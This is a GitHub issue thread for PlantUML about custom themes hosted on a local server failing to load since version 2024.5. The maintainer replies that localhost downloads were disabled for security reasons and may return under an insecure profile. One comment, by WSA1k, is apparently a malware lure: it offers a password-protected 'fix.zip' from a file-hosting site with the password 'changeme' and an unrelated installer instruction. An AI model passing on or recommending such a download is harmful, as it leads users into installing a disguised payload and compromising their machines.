### ISSUE TITLE
Custom Theme loading

### ISSUE THREAD

**Issue by MattisFieseler** [plantuml/plantuml#1878]
**Describe the bug**
I am using a custom theme served by a local hosted docker container. Since the 2024.5 Version an error message saying "Cannot open URL" appears when loading the theme

**To Reproduce**

1. Create custom theme and host it on local http-Server under /api/theme/puml-theme-custom.puml
2. loading the theme with !theme custom from http://localhost/api/theme
3. See error

**Expected behavior**
In Version 2024.4 the theme loads without Problems

**Desktop (please complete the following information):**

- OS: Windows with Plantuml Docker Container
- Browser chrome

**Additional context**
The Docu says to load the custom theme from github but it should word from local server as well

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by arnaudroques** [comment]
To address complex security concerns, we have entirely disabled downloads from localhost.

However, we are considering reintroducing this feature in the [INSECURE profile](https://plantuml.com/security).

Would this change be helpful to you?

**Comment by MattisFieseler** [comment]
This would be very helpful :)
